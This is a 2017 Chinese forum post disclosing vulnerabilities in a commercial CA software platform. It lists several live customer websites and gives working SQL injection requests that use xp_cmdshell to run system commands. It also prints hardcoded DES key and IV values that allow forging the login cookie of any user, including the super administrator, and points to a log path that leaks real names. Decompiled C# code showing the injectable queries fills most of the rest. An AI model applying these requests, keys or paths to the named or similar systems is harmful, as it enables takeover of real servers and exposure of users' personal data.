本帖最后由 s1m0n 于 2017-2-19 18:39 编辑
北京环宇通达CA正版系统存在漏洞,有如下客户
随便搜索,发现如下网站
http://windows.ioa.ac.cn/
http://softms.sdu.edu.cn/
http://ca.issas.ac.cn/login.aspx
http://202.127.19.61/
系统存在注入,普通用户在``操作日志->我的操作日志->关键字查询处``存在SQL注入。而且支持stacked query。
在数据库中创建表
GET /Tab/UserLog/MylogList.aspx?1&key=')%3bCREATE TABLE tmp(DATA VARCHAR(5000))%3b%20%2d%2d%20%44&mid=88 HTTP/1.1
执行命令
GET /Tab/UserLog/MylogList.aspx?1&key=')%3bINSERT+tmp+EXEC+master.dbo.xp_cmdshell+'whoami'%3b%20%2d%2d%20%44&mid=88
可以直接写入shell
static/image/hrline/5.gif
拿到dll,做逆向,获得部分源代码。
漏洞1 日志遍历
在Web目录下log/年月/年月日.txt 即为日志。例如view-source:http://windows.ioa.ac.cn/log/201702/20170209.txt
泄漏用户名,用户ID和真实姓名
漏洞2
任意用户cookie伪造
由于各客户登陆方式不同,由用SSO的,有ldap认证的,可能有的无法复现。下图为一些登陆方式,可以看到,几乎每个客户都开发了一种。
我们看用户cookie的生成。SetSession直接加密uid,代码如下
[C#] 纯文本查看 复制代码 HttpCookie userCookie = new HttpCookie("HyUserInfo");
StringEncryption s = new StringEncryption();
userCookie.Value = s.Encrypt(ui.UserId.ToString());
HttpContext.Current.Response.Cookies.Add(userCookie);
加密函数如下
[C#] 纯文本查看 复制代码 public string Encrypt(string sourceString)
{
byte[] btKey = System.Text.Encoding.Default.GetBytes(this.key);
byte[] btIV = System.Text.Encoding.Default.GetBytes(this.iv);
System.Security.Cryptography.DESCryptoServiceProvider des = new System.Security.Cryptography.DESCryptoServiceProvider();
string result;
using (System.IO.MemoryStream ms = new System.IO.MemoryStream())
{
byte[] inData = System.Text.Encoding.Default.GetBytes(sourceString);
try
{
using (System.Security.Cryptography.CryptoStream cs = new System.Security.Cryptography.CryptoStream(ms, des.CreateEncryptor(btKey, btIV), System.Security.Cryptography.CryptoStreamMode.Write))
{
cs.Write(inData, 0, inData.Length);
cs.FlushFinalBlock();
}
result = System.Convert.ToBase64String(ms.ToArray());
}
catch
{
throw;
}
}
return result;
}
key和iv向量都是死的
[C#] 纯文本查看 复制代码 private string iv = "HYTDCAPT";
private string key = "SHILPKEY";
加密的明文居然是用户ID,用户ID是从1递增的。直接可以登陆所有用户,且是任意用户。
另外,ID为1的用户是超级管理员,用户名为hytdadmin,因此获得超级管理员权限,能登陆后台。
例如,登陆id为3的用户
漏洞3 多处SQL注入
getshell使用的是普通用户在我的日志中->搜索日志存在SQL注入漏洞。我们看代码:
[C#] 纯文本查看 复制代码 System.Text.StringBuilder strWhere = new System.Text.StringBuilder();
System.Text.StringBuilder urlStr = new System.Text.StringBuilder();
this.ui = BaseUser.GetUserInfo();
this.mid = System.Convert.ToInt32(base.Request.QueryString["mid"]);
this.PageSize = BaseModule.GetDisplayLine(this.mid);
if (!base.IsPostBack)
{
this.PageIndex = 1;
strWhere.Append(" UserID=" + this.ui.UserId);
this.PageIndex = System.Convert.ToInt32(base.Request.QueryString["page"]);
if (this.PageIndex == 0)
{
this.PageIndex = 1;
}
string typename = base.Request.QueryString["ltsName"];
if (!string.IsNullOrEmpty(typename))
{
this.ltsName = typename;
}
this.key = base.Request.QueryString["key"];
this.lts = int.Parse((base.Request.QueryString["lts"] == null) ? "0" : base.Request.QueryString["lts"]);
this.begt = base.Request.QueryString["begt"];
this.endt = base.Request.QueryString["endt"];
if (this.key != null && this.key != "")
{
urlStr.Append("&key=" + HttpContext.Current.Server.UrlEncode(this.key));
strWhere.Append(string.Concat(new string[]
{
" and (LogTitle like '%",
this.key,
"%' or RealName like '%",
this.key,
"%' or LogRecord like '%",
this.key,
"%')"
}));
}
if (this.lts > 0)
{
urlStr.Append("<=" + this.lts);
strWhere.Append(" and LogType=" + this.lts);
}
if (this.begt != null && this.begt != "" && this.endt != null && this.endt != "")
{
urlStr.Append("&begt=" + this.begt + "&endt=" + this.endt);
strWhere.Append(string.Concat(new string[]
{
" and DateTime>='",
this.begt,
" 00:00:00' and DateTime<='",
this.endt,
" 23:59:59'"
}));
}
else
{
if (this.begt != null && this.begt != "")
{
urlStr.Append("&begt=" + this.begt);
strWhere.Append(" and DateTime>='" + this.begt + " 00:00:00'");
}
if (this.endt != null && this.endt != "")
{
urlStr.Append("&endt=" + this.endt);
strWhere.Append(" and DateTime<='" + this.endt + " 23:59:59'");
}
}
string strOrder = " LID desc";
HYTD.CAPlatform.BLL.TB_Log Bll_Log = new HYTD.CAPlatform.BLL.TB_Log();
this.Repeater1.DataSource = Bll_Log.GetList(this.PageSize, this.PageIndex, strOrder, strWhere.ToString()).Tables[0];
this.Repeater1.DataBind();
HYTD.CAPlatform.BLL.TB_Module mTitle = new HYTD.CAPlatform.BLL.TB_Module();
object Totle = Bll_Log.GetRecordCount(strWhere.ToString());
string FileUrl = string.Concat(new object[]
{
"MylogList.aspx?1",
urlStr,
"&mid=",
this.mid
});
string url = "";
string ShowJump = "true";
int pagestyle = 2;
this.cutepage.Text = GetPage.PageStr(FileUrl, url, System.Convert.ToInt32(Totle), this.PageSize, this.PageIndex, ShowJump, pagestyle);
this.Repeater1.Dispose();
if (System.Convert.ToInt32(Totle) < 1)
{
this.noinfo.Visible = true;
this.noinfo.Text = "<tr><td colspan=\"8\">没有数据....</td></tr>";
}
}
直接获取用户输入的关键字,时间等赋值,而后拼接给strWhere,然后调用Bll_Log.GetList, Bll_Log.GetList调用dal.GetList, dal.GetList调用DbHelperSQL.GetRecordByPage,看代码
直接拼接,然后使用Query函数
[C#] 纯文本查看 复制代码 // HYTD.CAPlatform.DBUtility.DbHelperSQL
public static DataSet GetRecordByPage(string TableName, string mainfldName, string fldName, int pageSize, int currentPage, string strOrder, string strWhere)
{
if (strOrder != "")
{
strOrder = " order by " + strOrder;
}
string strSQL;
if (currentPage > 1)
{
int subpage = (currentPage - 1) * pageSize;
if (strWhere != "")
{
strSQL = string.Concat(new object[]
{
"select top ",
pageSize,
" ",
fldName,
" from ",
TableName,
" where ",
mainfldName,
" not in (select top ",
subpage.ToString(),
" ",
mainfldName,
" from ",
TableName,
" where ",
strWhere,
" ",
strOrder,
" ) and ",
strWhere,
" ",
strOrder
});
}
else
{
strSQL = string.Concat(new object[]
{
"select top ",
pageSize,
" ",
fldName,
" from ",
TableName,
" where ",
mainfldName,
" not in (select top ",
subpage.ToString(),
" ",
mainfldName,
" from ",
TableName,
" ",
strOrder,
" ) ",
strOrder
});
}
}
else if (strWhere != "")
{
strSQL = string.Concat(new object[]
{
"select top ",
pageSize,
" ",
fldName,
" from ",
TableName,
" where ",
strWhere,
" ",
strOrder
});
}
else
{
strSQL = string.Concat(new object[]
{
"select top ",
pageSize,
" ",
fldName,
" from ",
TableName,
" ",
strOrder
});
}
return DbHelperSQL.Query(strSQL);
}
SQL注入2
管理员getshell地方很多,例如系统设置->安装软件管理,搜索可以注入。在HYTD.CAPlatform.Web.ashx.DownloadSoft中。查看代码:
[C#] 纯文本查看 复制代码 string strName = WebUtil.GetQueryValue<string>("name", "");
这里获取strName
[C#] 纯文本查看 复制代码 if (strName != null)
{
search = strName.Trim();
}
赋值给search
[C#] 纯文本查看 复制代码 if (search != "")
{
search = " name like '%" + search + "%'";
where = where + " and " + search;
}
直接拼接到SQL语句
[C#] 纯文本查看 复制代码 {
dt = this.bll.GetSoftInfoForSortDownCount(this.model, where, ConvertHelper.GetInteger(ConfigurationManager.AppSettings.Get("pageSize")), pageindex, order);
}
else
{
dt = this.bll.GetSoftInfo(this.model, where, ConvertHelper.GetInteger(ConfigurationManager.AppSettings.Get("pageSize")), pageindex, order);
}
调用函数执行。
[C#] 纯文本查看 复制代码 // HYTD.CAPlatform.DAL.TB_SoftDownList
public DataTable GetSoftInfoForSortDownCount(TB_SoftDownList model, string where, int pagesize, int pageindex, string strOrder)
{
StringBuilder strsql = new StringBuilder();
string Where = string.Empty;
if (where != "")
{
Where = where;
}
else
{
Where = "status=1";
}
strsql.Append("select top " + pagesize + " *,(mark/(case man when 0 then 1 else man end))as softcomm from tb_softdownlist \r\n left join (select OS_SoftID,count(OS_SoftID) sort from TB_OpreatingSoftware group by OS_SoftID ) b on TB_SoftDownList.id=b.OS_SoftID\r\n where id not in ");
strsql.Append(string.Concat(new object[]
{
"(select top ",
pagesize * (pageindex - 1),
" id from tb_softdownlist left join (select OS_SoftID,count(OS_SoftID) sort \r\n from TB_OpreatingSoftware group by OS_SoftID ) b on TB_SoftDownList.id=b.OS_SoftID where ",
Where,
strOrder,
") "
}));
strsql.Append(" and " + Where + " " + strOrder);
return DbHelperSQL.Query(strsql.ToString()).Tables[0];
}
直接拼接,导致SQL注入。
SQL注入3
管理员查看用户日志
[C#] 纯文本查看 复制代码 this.key = base.Request.QueryString["key"];
this.lts = int.Parse((base.Request.QueryString["lts"] == null) ? "0" : base.Request.QueryString["lts"]);
this.begt = base.Request.QueryString["begt"];
this.endt = base.Request.QueryString["endt"];
string typename = base.Request.QueryString["ltsName"];
if (!string.IsNullOrEmpty(typename))
{
this.ltsName = typename;
}
if (this.PageIndex == 0)
{
this.PageIndex = 1;
}
if (this.key != null && this.key != "")
{
urlStr.Append("&key=" + HttpContext.Current.Server.UrlEncode(this.key));
strWhere.Append(string.Concat(new string[]
{
" and (LogTitle like '%",
this.key,
"%' or RealName like '%",
this.key,
"%' or LogRecord like '%",
this.key,
"%')"
}));
}
if (this.lts > 0)
{
urlStr.Append("<s=" + this.lts);
strWhere.Append(" and LogType=" + this.lts);
}
if (this.begt != null && this.begt != "" && this.endt != null && this.endt != "")
{
urlStr.Append("&begt=" + this.begt + "&endt=" + this.endt);
strWhere.Append(string.Concat(new string[]
{
" and DateTime>='",
this.begt,
" 00:00:00' and DateTime<='",
this.endt,
" 23:59:59'"
}));
}
else
{
if (this.begt != null && this.begt != "")
{
urlStr.Append("&begt=" + this.begt);
strWhere.Append(" and DateTime>='" + this.begt + " 00:00:00'");
}
if (this.endt != null && this.endt != "")
{
urlStr.Append("&endt=" + this.endt);
strWhere.Append(" and DateTime<='" + this.endt + " 23:59:59'");
}
}
直接获取key,begt,endt,并且拼接进入strWhere,然后调用Bll_Log.GetList
[C#] 纯文本查看 复制代码 string strOrder = " LID desc";
HYTD.CAPlatform.BLL.TB_Log Bll_Log = new HYTD.CAPlatform.BLL.TB_Log();
this.Repeater1.DataSource = Bll_Log.GetList(this.PageSize, this.PageIndex, strOrder, strWhere.ToString()).Tables[0];
后面的过程跟第一个一样,就不多说了。
|